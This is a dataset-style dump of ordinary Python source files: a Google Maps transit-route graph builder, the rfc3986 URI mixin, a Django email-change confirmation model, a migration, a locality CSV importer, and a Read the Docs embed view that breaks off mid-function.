repo_name (string, len 5-92) | path (string, len 4-221) | copies (string, 19 classes) | size (string, len 4-6) | content (string, len 766-896k) | license (string, 15 classes) | hash (int64) | line_mean (float64, 6.51-99.9) | line_max (int64, 32-997) | alpha_frac (float64, 0.25-0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5-13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
achak1987/greenroute | src/google.py | 1 | 8516 | '''
@author: Antorweep Chakravorty
'''
import googlemaps
import rapidjson as json
import pickle
import pprint
from datetime import datetime
from vertex import vertex
from edge import edge
class GoogleMapsAPI(object):
def __init__(self, username, password, app_id, app_token):
self.username = username
self.password = password
self.app_id = app_id
self.api_token = app_token
self.gmaps = googlemaps.Client(key=self.api_token)
@classmethod
def from_credentials_file(self, file_name):
f = open(file_name)
credentials = json.loads(f.read())["google"]
args = tuple(credentials[key] for key in ('username','password', 'app_id' ,'api_token'))
return GoogleMapsAPI(*args)
def decode_line(self, encoded):
"""Decodes a polyline that was encoded using the Google Maps method.
See http://code.google.com/apis/maps/documentation/polylinealgorithm.html
This is a straightforward Python port of Mark McClure's JavaScript polyline decoder
(http://facstaff.unca.edu/mcmcclur/GoogleMaps/EncodePolyline/decode.js)
and Peter Chng's PHP polyline decode
(http://unitstep.net/blog/2008/08/02/decoding-google-maps-encoded-polylines-using-php/)
"""
encoded_len = len(encoded)
index = 0
array = []
lat = 0
lng = 0
while index < encoded_len:
b = 0
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlat = ~(result >> 1) if result & 1 else result >> 1
lat += dlat
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlng = ~(result >> 1) if result & 1 else result >> 1
lng += dlng
array.append((lat * 1e-5, lng * 1e-5))
return array
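# Illustrative check for decode_line (comment only, not part of the original
# module): the encoded string below is the sample polyline from Google's
# encoding documentation, so the exact literals are an assumption based on
# that published example rather than on this project.
#
#   api.decode_line("_p~iF~ps|U_ulLnnqC_mqNvxq`@")
#   -> [(38.5, -120.2), (40.7, -120.95), (43.252, -126.453)]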
def getGeoCode(self, address):
coordinates = self.gmaps.geocode(address)[0]['geometry']['location']
return str(coordinates["lat"]) + "," + str(coordinates["lng"])
def getAddress(self, longitude, latitude):
return self.gmaps.reverse_geocode((latitude, longitude))
def getRoutes(self, origin, destination, departBy, alternatives):
#Store all routes returned by GoogleMap API
graphs = []
directions_result = self.gmaps.directions(origin,
destination,
mode="transit",
departure_time=departBy,
alternatives=alternatives)
#print(json.dumps(directions_result, indent=2))
#iterate through each route
for d in directions_result:
#describes the legs of the journey.
#For routes that contain no waypoints, the route will consist of a single "leg,"
#but for routes that define one or more waypoints,
#the route will consist of one or more legs
legs = d["legs"]
#Store the vertexes
vertices = []
#Store the edges
edges = []
for l in legs:
#Contains an array of steps denoting information about each separate step of the leg
steps = l["steps"]
for s in steps:
travel_mode = s["travel_mode"]
html_instructions = s["html_instructions"]
if travel_mode == "WALKING":
walking_steps = s["steps"]
for ws in walking_steps:
start_location = ws["start_location"]
end_location = ws["end_location"]
html_instructions = (ws["html_instructions"] if "html_instructions" in ws else "")
distance = ws["distance"]["value"]
duration = ws["duration"]["value"]
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "false")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "false")
connection = edge(start_vertex_id, end_vertex_id, travel_mode,
distance, duration)
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
edges.append(connection.getEdge())
elif travel_mode == "TRANSIT":
transit_details = s["transit_details"]
headsign = transit_details["headsign"]
departure_stop = transit_details["departure_stop"]
arrival_stop = transit_details["arrival_stop"]
departure_time = transit_details["departure_time"]
arrival_time = transit_details["arrival_time"]
num_stops = transit_details["num_stops"]
short_name = transit_details["line"]
start_location = s["start_location"]
end_location = s["end_location"]
stops_coordinates = self.decode_line(s["polyline"]["points"])
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "true")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "true")
distance = s["distance"]["value"]/num_stops
duration = s["duration"]["value"]/num_stops
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
prev_vertex_id = start_vertex_id
for stop in stops_coordinates:
lat = stop[0]
lng = stop[1]
vertex_id = hash(str(lat)+str(lng))
stop_vertex = vertex(vertex_id, lat, lng, "true")
connection = edge(prev_vertex_id, vertex_id, travel_mode,
distance, duration)
prev_vertex_id = vertex_id
vertices.append(stop_vertex.getVertex())
edges.append(connection.getEdge())
connection = edge(prev_vertex_id, end_vertex_id, travel_mode,
distance, duration)
edges.append(connection.getEdge())
#TODO: DRIVING
graphs.append((vertices, edges))
return graphs
#if __name__ == "__main__":
#main()
api = GoogleMapsAPI.from_credentials_file('credentials.json')
# Geocoding an address
origin = api.getGeoCode('Randaberg')
destination = api.getGeoCode('Kjell Arholmsgate 41, 4036 Stavanger, NO')
now = datetime.now()
#depart = datetime(2016, 11, 22, 12, 0, 0)
routes = api.getRoutes(origin, destination, now, False)
with open("graphs.out", 'wb') as f:
pickle.dump(routes, f)
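# A minimal follow-up sketch (not part of the original script) showing how the
# pickled graphs written above could be read back for inspection; it assumes
# "graphs.out" was produced by the pickle.dump() call directly above.
#
#   with open("graphs.out", "rb") as f:
#       graphs = pickle.load(f)
#   for vertices, edges in graphs:
#       print("route with %d vertices and %d edges" % (len(vertices), len(edges)))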
| mit | -5,904,404,823,734,875,000 | 39.746411 | 136 | 0.486731 | false | 4.489193 | false | false | false |
liszd/whyliam.workflows.youdao | urllib3/packages/rfc3986/_mixin.py | 1 | 13255 | """Module containing the implementation of the URIMixin class."""
import warnings
from . import exceptions as exc
from . import misc
from . import normalizers
from . import validators
class URIMixin(object):
"""Mixin with all shared methods for URIs and IRIs."""
__hash__ = tuple.__hash__
def authority_info(self):
"""Return a dictionary with the ``userinfo``, ``host``, and ``port``.
If the authority is not valid, it will raise a
:class:`~rfc3986.exceptions.InvalidAuthority` Exception.
:returns:
``{'userinfo': 'username:password', 'host': 'www.example.com',
'port': '80'}``
:rtype: dict
:raises rfc3986.exceptions.InvalidAuthority:
If the authority is not ``None`` and can not be parsed.
"""
if not self.authority:
return {"userinfo": None, "host": None, "port": None}
match = self._match_subauthority()
if match is None:
# In this case, we have an authority that was parsed from the URI
# Reference, but it cannot be further parsed by our
# misc.SUBAUTHORITY_MATCHER. In this case it must not be a valid
# authority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
# We had a match, now let's ensure that it is actually a valid host
# address if it is IPv4
matches = match.groupdict()
host = matches.get("host")
if (
host
and misc.IPv4_MATCHER.match(host)
and not validators.valid_ipv4_host_address(host)
):
# If we have a host, it appears to be IPv4 and it does not have
# valid bytes, it is an InvalidAuthority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
return matches
def _match_subauthority(self):
return misc.SUBAUTHORITY_MATCHER.match(self.authority)
@property
def host(self):
"""If present, a string representing the host."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["host"]
@property
def port(self):
"""If present, the port extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["port"]
@property
def userinfo(self):
"""If present, the userinfo extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["userinfo"]
def is_absolute(self):
"""Determine if this URI Reference is an absolute URI.
See http://tools.ietf.org/html/rfc3986#section-4.3 for explanation.
:returns: ``True`` if it is an absolute URI, ``False`` otherwise.
:rtype: bool
"""
return bool(misc.ABSOLUTE_URI_MATCHER.match(self.unsplit()))
def is_valid(self, **kwargs):
"""Determine if the URI is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require_scheme: Set to ``True`` if you wish to require the
presence of the scheme component.
:param bool require_authority: Set to ``True`` if you wish to require
the presence of the authority component.
:param bool require_path: Set to ``True`` if you wish to require the
presence of the path component.
:param bool require_query: Set to ``True`` if you wish to require the
presence of the query component.
:param bool require_fragment: Set to ``True`` if you wish to require
the presence of the fragment component.
:returns: ``True`` if the URI is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
validators = [
(self.scheme_is_valid, kwargs.get("require_scheme", False)),
(self.authority_is_valid, kwargs.get("require_authority", False)),
(self.path_is_valid, kwargs.get("require_path", False)),
(self.query_is_valid, kwargs.get("require_query", False)),
(self.fragment_is_valid, kwargs.get("require_fragment", False)),
]
return all(v(r) for v, r in validators)
def authority_is_valid(self, require=False):
"""Determine if the authority component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require:
Set to ``True`` to require the presence of this component.
:returns:
``True`` if the authority is valid. ``False`` otherwise.
:rtype:
bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
try:
self.authority_info()
except exc.InvalidAuthority:
return False
return validators.authority_is_valid(
self.authority, host=self.host, require=require
)
def scheme_is_valid(self, require=False):
"""Determine if the scheme component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the scheme is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.scheme_is_valid(self.scheme, require)
def path_is_valid(self, require=False):
"""Determine if the path component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the path is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.path_is_valid(self.path, require)
def query_is_valid(self, require=False):
"""Determine if the query component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the query is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.query_is_valid(self.query, require)
def fragment_is_valid(self, require=False):
"""Determine if the fragment component is valid.
.. deprecated:: 1.1.0
Use the Validator object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the fragment is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.fragment_is_valid(self.fragment, require)
def normalized_equality(self, other_ref):
"""Compare this URIReference to another URIReference.
:param URIReference other_ref: (required), The reference with which
we're comparing.
:returns: ``True`` if the references are equal, ``False`` otherwise.
:rtype: bool
"""
return tuple(self.normalize()) == tuple(other_ref.normalize())
def resolve_with(self, base_uri, strict=False):
"""Use an absolute URI Reference to resolve this relative reference.
Assuming this is a relative reference that you would like to resolve,
use the provided base URI to resolve it.
See http://tools.ietf.org/html/rfc3986#section-5 for more information.
:param base_uri: Either a string or URIReference. It must be an
absolute URI or it will raise an exception.
:returns: A new URIReference which is the result of resolving this
reference using ``base_uri``.
:rtype: :class:`URIReference`
:raises rfc3986.exceptions.ResolutionError:
If the ``base_uri`` is not an absolute URI.
"""
if not isinstance(base_uri, URIMixin):
base_uri = type(self).from_string(base_uri)
if not base_uri.is_absolute():
raise exc.ResolutionError(base_uri)
# This is optional per
# http://tools.ietf.org/html/rfc3986#section-5.2.1
base_uri = base_uri.normalize()
# The reference we're resolving
resolving = self
if not strict and resolving.scheme == base_uri.scheme:
resolving = resolving.copy_with(scheme=None)
# http://tools.ietf.org/html/rfc3986#page-32
if resolving.scheme is not None:
target = resolving.copy_with(
path=normalizers.normalize_path(resolving.path)
)
else:
if resolving.authority is not None:
target = resolving.copy_with(
scheme=base_uri.scheme,
path=normalizers.normalize_path(resolving.path),
)
else:
if resolving.path is None:
if resolving.query is not None:
query = resolving.query
else:
query = base_uri.query
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=base_uri.path,
query=query,
)
else:
if resolving.path.startswith("/"):
path = normalizers.normalize_path(resolving.path)
else:
path = normalizers.normalize_path(
misc.merge_paths(base_uri, resolving.path)
)
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=path,
query=resolving.query,
)
return target
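# Illustrative resolution (comment only): the reference examples below come from
# RFC 3986 section 5.4, and the rfc3986.uri_reference() entry point used to build
# the instances is an assumption, not something defined in this module.
#
#   base = uri_reference("http://a/b/c/d;p?q")
#   uri_reference("../g").resolve_with(base).unsplit()  -> "http://a/b/g"
#   uri_reference("g?y").resolve_with(base).unsplit()   -> "http://a/b/c/g?y"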
def unsplit(self):
"""Create a URI string from the components.
:returns: The URI Reference reconstituted as a string.
:rtype: str
"""
# See http://tools.ietf.org/html/rfc3986#section-5.3
result_list = []
if self.scheme:
result_list.extend([self.scheme, ":"])
if self.authority:
result_list.extend(["//", self.authority])
if self.path:
result_list.append(self.path)
if self.query is not None:
result_list.extend(["?", self.query])
if self.fragment is not None:
result_list.extend(["#", self.fragment])
return "".join(result_list)
def copy_with(
self,
scheme=misc.UseExisting,
authority=misc.UseExisting,
path=misc.UseExisting,
query=misc.UseExisting,
fragment=misc.UseExisting,
):
"""Create a copy of this reference with the new components.
:param str scheme:
(optional) The scheme to use for the new reference.
:param str authority:
(optional) The authority to use for the new reference.
:param str path:
(optional) The path to use for the new reference.
:param str query:
(optional) The query to use for the new reference.
:param str fragment:
(optional) The fragment to use for the new reference.
:returns:
New URIReference with provided components.
:rtype:
URIReference
"""
attributes = {
"scheme": scheme,
"authority": authority,
"path": path,
"query": query,
"fragment": fragment,
}
for key, value in list(attributes.items()):
if value is misc.UseExisting:
del attributes[key]
uri = self._replace(**attributes)
uri.encoding = self.encoding
return uri
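# Usage sketch for copy_with()/unsplit() (comment only; the concrete URI and the
# rfc3986.uri_reference() helper are assumptions, not part of this module):
#
#   ref = uri_reference("https://example.com/a?x=1#frag")
#   ref.copy_with(query="x=2", fragment=None).unsplit()
#   -> "https://example.com/a?x=2"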
| mit | 3,825,426,568,369,881,600 | 34.727763 | 78 | 0.572312 | false | 4.592862 | false | false | false |
tarak/django-change-email | change_email/models.py | 1 | 7639 | from datetime import timedelta
from django.contrib.sites.models import RequestSite
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.db import models
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.core.signing import Signer
from django.core.signing import BadSignature
from change_email.conf import settings
from change_email.managers import ExpiredEmailChangeManager
from change_email.managers import PendingEmailChangeManager
class EmailChange(models.Model):
"""
A model to temporarily store an email adress change request.
"""
new_email = models.EmailField(help_text=_('The new email address that'
' still needs to be confirmed.'),
verbose_name=_('new email address'),)
date = models.DateTimeField(auto_now_add=True,
help_text=_('The date and time the email '
'address change was requested.'),
verbose_name=_('date'),)
user = models.OneToOneField(settings.AUTH_USER_MODEL,
help_text=_('The user that has requested the'
' email address change.'),
verbose_name=_('user'),)
site = models.ForeignKey(Site, blank=True, null=True)
objects = models.Manager()
expired_objects = ExpiredEmailChangeManager()
pending_objects = PendingEmailChangeManager()
class Meta:
verbose_name = _('email address change request')
verbose_name_plural = _('email address change requests')
get_latest_by = "date"
def __unicode__(self):
return "%s" % self.user
def get_absolute_url(self):
return reverse('change_email_detail', kwargs={'pk': self.pk})
def has_expired(self, seconds=None):
"""
Checks whether this request has already expired.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: ``True`` if the request has already expired,
``False`` otherwise.
:rtype: bool
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
expiration_date = timezone.now() - delta
return expiration_date >= self.date
def check_signature(self, signature):
"""
Checks if
- the signature has not expired by calling :func:`has_expired`.
- the signature has not been tampered with by
calling :func:`verify_signature`.
:arg str signature: The signature to check, as generated
by :func:`make_signature`.
:returns: ``True`` if the check was successfully completed,
``False`` otherwise.
:rtype: bool
"""
if not self.has_expired():
return self.verify_signature(signature)
return False
def get_expiration_date(self, seconds=None):
"""
Returns the expiration date of an :model:`EmailChange` object by adding
a given amount of seconds to it.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: A :py:class:`datetime` object representing the expiration
date.
:rtype: :py:obj:`.datetime`
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
return self.date + delta
def make_signature(self):
"""
Generates a signature to use in one-time secret URL's
to confirm the email address change request.
:returns: A signature.
:rtype: str
"""
signer = Signer()
value = signer.sign(self.new_email)
email, signature = value.split(':', 1)
return signature
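    # Round-trip sketch (comment only): the signature produced here is what
    # check_signature()/verify_signature() later accept, e.g. for a pending
    # request object named ``change`` (a hypothetical instance):
    #
    #   signature = change.make_signature()
    #   change.check_signature(signature)    # True while the request has not expired
    #   change.check_signature("tampered")   # False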
def send_confirmation_mail(self, request):
"""
An instance method to send a confirmation mail to the new
email address.
The generation of a confirmation email will use three templates that
can be set in each project's settings:
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE`.
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE`
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE`
These templates will receive the following context variables:
``date``
The date when the email address change was requested.
``timeout_date``
The date whe the request will expire.
``current_site``
An object representing the current site on which the user
is logged in. Depending on whether ``django.contrib.sites``
is installed, this may be an instance of either
``django.contrib.sites.models.Site`` (if the sites
application is installed) or
``django.contrib.sites.models.RequestSite`` (if
not). Consult the documentation for the Django sites
framework for details regarding these objects' interfaces.
``new_email``
The new email address.
``protocol``
The protocol used to generate the confirmation URL, either HTTP or HTTPS.
To use HTTPS set :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_USE_HTTPS`
to True.
``signature``
The confirmation signature for the new email address.
``user``
The user that has requested the email address change.
:arg obj request: The request object.
"""
if Site._meta.installed:
current_site = Site.objects.get_current()
else:
current_site = RequestSite(request)
subject = settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE
body_htm = settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE
body_txt = settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE
context = {'current_site': current_site,
'date': self.date,
'timeout_date': self.get_expiration_date(),
'new_email': self.new_email,
'protocol': settings.EMAIL_CHANGE_USE_HTTPS and 'https' or 'http',
'signature': self.make_signature(),
'user': self.user}
subject = render_to_string(subject, context)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
text_message = render_to_string(body_txt, context)
if settings.EMAIL_CHANGE_HTML_EMAIL:
html_message = render_to_string(body_htm, context)
msg = EmailMultiAlternatives(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
msg.attach_alternative(html_message, "text/html")
msg.send()
else:
send_mail(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
def verify_signature(self, signature):
"""
Checks if the signature has been tampered with.
:arg str signature: The signature to check, as generated by
:func:`make_signature`.
:returns: ``True`` if the signature has not been tampered with,
``False`` otherwise.
:rtype: bool
"""
signer = Signer()
value = "%s:%s" % (self.new_email, signature)
try:
signer.unsign(value)
except BadSignature:
return False
return True
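# A minimal usage sketch (not part of the original module) of how a view might
# create a pending request and send the confirmation mail; the ``request`` and
# ``user`` objects and the target address are assumptions.
#
#   change = EmailChange.objects.create(user=request.user,
#                                       new_email='new@example.com')
#   change.send_confirmation_mail(request)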
| bsd-3-clause | 3,157,295,114,515,443,000 | 35.37619 | 87 | 0.645765 | false | 4.301239 | false | false | false |
qgis/QGIS-Django | qgis-app/styles/migrations/0008_auto_20201215_2124.py | 1 | 2000 | # Generated by Django 2.2.13 on 2020-12-15 21:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('styles', '0007_auto_20201109_0112'),
]
operations = [
migrations.AlterField(
model_name='style',
name='approved',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you wish to approve this resource.', verbose_name='Approved'),
),
migrations.AlterField(
model_name='style',
name='creator',
field=models.ForeignKey(help_text='The user who uploaded this resource.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Created by'),
),
migrations.AlterField(
model_name='style',
name='download_count',
field=models.IntegerField(default=0, editable=False, help_text='The number of times this resource has been downloaded. This is updated automatically.', verbose_name='Downloads'),
),
migrations.AlterField(
model_name='style',
name='require_action',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you require creator to update the resource.', verbose_name='Requires Action'),
),
migrations.AlterField(
model_name='stylereview',
name='review_date',
field=models.DateTimeField(auto_now_add=True, help_text='The review date. Automatically added on review resource.', verbose_name='Reviewed on'),
),
migrations.AlterField(
model_name='stylereview',
name='reviewer',
field=models.ForeignKey(help_text='The user who reviewed this GeoPackage.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Reviewed by'),
),
]
| gpl-2.0 | -8,970,080,980,762,410,000 | 43.444444 | 190 | 0.6405 | false | 4.310345 | false | false | false |
alexhayes/django-geopostcodes | django_geopostcodes/helpers.py | 1 | 1155 | # -*- coding: utf-8 -*-
"""
django_geopostcodes.helpers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Helper functions for django-geopostcodes.
"""
from __future__ import absolute_import, print_function, unicode_literals
import csv
from django.contrib.gis.geos import Point
from django.db.transaction import atomic
from .models import Locality
def import_localities(path, delimiter=';'):
"""
Import localities from a CSV file.
:param path: Path to the CSV file containing the localities.
"""
creates = []
updates = []
with open(path, mode="r") as infile:
reader = csv.DictReader(infile, delimiter=str(delimiter))
with atomic():
for row in reader:
row['point'] = Point(float(row['longitude']),
float(row['latitude']))
locality, created = Locality.objects.update_or_create(
id=row['id'],
defaults=row
)
if created:
creates.append(locality)
else:
updates.append(locality)
return creates, updates
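# A short usage sketch (assumption: a semicolon-delimited CSV containing the
# 'id', 'longitude' and 'latitude' columns referenced above; the path is
# hypothetical):
#
#   created, updated = import_localities('/path/to/localities.csv')
#   print('%d created, %d updated' % (len(created), len(updated)))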
| mit | 4,832,721,024,787,421,000 | 25.25 | 72 | 0.547186 | false | 4.529412 | false | false | false |
rtfd/readthedocs.org | readthedocs/embed/views.py | 1 | 13361 | """Views for the embed app."""
import functools
import json
import logging
import re
from urllib.parse import urlparse
from django.shortcuts import get_object_or_404
from django.template.defaultfilters import slugify
from django.utils.functional import cached_property
from docutils.nodes import make_id
from pyquery import PyQuery as PQ # noqa
from rest_framework import status
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from readthedocs.api.v2.mixins import CachedResponseMixin
from readthedocs.api.v2.permissions import IsAuthorizedToViewVersion
from readthedocs.builds.constants import EXTERNAL
from readthedocs.core.resolver import resolve
from readthedocs.core.unresolver import unresolve
from readthedocs.core.utils.extend import SettingsOverrideObject
from readthedocs.embed.utils import recurse_while_none
from readthedocs.projects.models import Project
from readthedocs.storage import build_media_storage
log = logging.getLogger(__name__)
def escape_selector(selector):
"""Escape special characters from the section id."""
regex = re.compile(r'(!|"|#|\$|%|\'|\(|\)|\*|\+|\,|\.|\/|\:|\;|\?|@)')
ret = re.sub(regex, r'\\\1', selector)
return ret
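# Quick illustration of the escaping performed above (comment only; the input is
# a hypothetical Sphinx section id):
#
#   escape_selector("module-foo.bar")  -> "module-foo\\.bar"  (the dot is backslash-escaped)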
def clean_links(obj, url):
"""
Rewrite (internal) links to make them absolute.
1. external links are not changed
2. prepend URL to links that are just fragments (e.g. #section)
3. prepend URL (without filename) to internal relative links
"""
if url is None:
return obj
for link in obj.find('a'):
base_url = urlparse(url)
# We need to make all internal links, to be absolute
href = link.attrib['href']
parsed_href = urlparse(href)
if parsed_href.scheme or parsed_href.path.startswith('/'):
# don't change external links
continue
if not parsed_href.path and parsed_href.fragment:
# href="#section-link"
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
continue
if not base_url.path.endswith('/'):
# internal relative link
# href="../../another.html" and ``base_url`` is not HTMLDir
# (e.g. /en/latest/deep/internal/section/page.html)
# we want to remove the trailing filename (page.html) and use the rest as base URL
# The resulting absolute link should be
# https://slug.readthedocs.io/en/latest/deep/internal/section/../../another.html
# remove the filename (page.html) from the original document URL (base_url) and,
path, _ = base_url.path.rsplit('/', 1)
# append the value of href (../../another.html) to the base URL.
base_url = base_url._replace(path=path + '/')
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
return obj
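# Example of the rewriting above (comment only; the page URL is hypothetical).
# With url = "https://proj.readthedocs.io/en/latest/guide/page.html":
#   href="#install"          becomes "https://proj.readthedocs.io/en/latest/guide/page.html#install"
#   href="../other.html"     becomes "https://proj.readthedocs.io/en/latest/guide/../other.html"
#   href="https://e.com/x"   is left unchanged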
class EmbedAPIBase(CachedResponseMixin, APIView):
# pylint: disable=line-too-long
"""
Embed a section of content from any Read the Docs page.
Returns headers and content that matches the queried section.
### Arguments
We support two different ways to query the API:
* project (required)
* version (required)
* doc or path (required)
* section
or:
* url (with fragment) (required)
### Example
- GET https://readthedocs.org/api/v2/embed/?project=requests&version=latest&doc=index&section=User%20Guide&path=/index.html
- GET https://readthedocs.org/api/v2/embed/?url=https://docs.readthedocs.io/en/latest/features.html%23github-bitbucket-and-gitlab-integration
# Current Request
""" # noqa
permission_classes = [IsAuthorizedToViewVersion]
renderer_classes = [JSONRenderer, BrowsableAPIRenderer]
@functools.lru_cache(maxsize=1)
def _get_project(self):
if self.unresolved_url:
project_slug = self.unresolved_url.project.slug
else:
project_slug = self.request.GET.get('project')
return get_object_or_404(Project, slug=project_slug)
@functools.lru_cache(maxsize=1)
def _get_version(self):
if self.unresolved_url:
version_slug = self.unresolved_url.version_slug
else:
version_slug = self.request.GET.get('version', 'latest')
project = self._get_project()
return get_object_or_404(project.versions.all(), slug=version_slug)
@cached_property
def unresolved_url(self):
url = self.request.GET.get('url')
if not url:
return None
return unresolve(url)
def get(self, request):
"""Handle the get request."""
project = self._get_project()
version = self._get_version()
url = request.GET.get('url')
path = request.GET.get('path', '')
doc = request.GET.get('doc')
section = request.GET.get('section')
if url:
unresolved = self.unresolved_url
path = unresolved.filename
section = unresolved.fragment
elif not path and not doc:
return Response(
{
'error': (
'Invalid Arguments. '
'Please provide "url" or "section" and "path" GET arguments.'
)
},
status=status.HTTP_400_BAD_REQUEST
)
# Generate the docname from path
# by removing the ``.html`` extension and trailing ``/``.
if path:
doc = re.sub(r'(.+)\.html$', r'\1', path.strip('/'))
response = do_embed(
project=project,
version=version,
doc=doc,
section=section,
path=path,
url=url,
)
if not response:
return Response(
{
'error': (
"Can't find content for section: "
f"doc={doc} path={path} section={section}"
)
},
status=status.HTTP_404_NOT_FOUND
)
return Response(response)
class EmbedAPI(SettingsOverrideObject):
_default_class = EmbedAPIBase
def do_embed(*, project, version, doc=None, path=None, section=None, url=None):
"""Get the embed reponse from a document section."""
if not url:
external = version.type == EXTERNAL
url = resolve(
project=project,
version_slug=version.slug,
filename=path or doc,
external=external,
)
content = None
headers = None
if version.is_sphinx_type:
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
if not file_content:
return None
content, headers, section = parse_sphinx(
content=file_content,
section=section,
url=url,
)
else:
# TODO: this should read from the html file itself,
# we don't have fjson files for mkdocs.
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
content, headers, section = parse_mkdocs(
content=file_content,
section=section,
url=url,
)
if content is None:
return None
return {
'content': content,
'headers': headers,
'url': url,
'meta': {
'project': project.slug,
'version': version.slug,
'doc': doc,
'section': section,
},
}
def _get_doc_content(project, version, doc):
storage_path = project.get_storage_path(
'json',
version_slug=version.slug,
include_file=False,
version_type=version.type,
)
file_path = build_media_storage.join(
storage_path,
f'{doc}.fjson'.lstrip('/'),
)
try:
with build_media_storage.open(file_path) as file:
return json.load(file)
except Exception: # noqa
log.warning('Unable to read file. file_path=%s', file_path)
return None
def parse_sphinx(content, section, url):
"""Get the embed content for the section."""
body = content.get('body')
toc = content.get('toc')
if not content or not body or not toc:
return (None, None, section)
headers = [
recurse_while_none(element)
for element in PQ(toc)('a')
]
if not section and headers:
# If no section is sent, return the content of the first one
# TODO: This will always be the full page content,
# lets do something smarter here
section = list(headers[0].keys())[0].lower()
if not section:
return [], headers, None
body_obj = PQ(body)
escaped_section = escape_selector(section)
elements_id = [
escaped_section,
slugify(escaped_section),
make_id(escaped_section),
f'module-{escaped_section}',
]
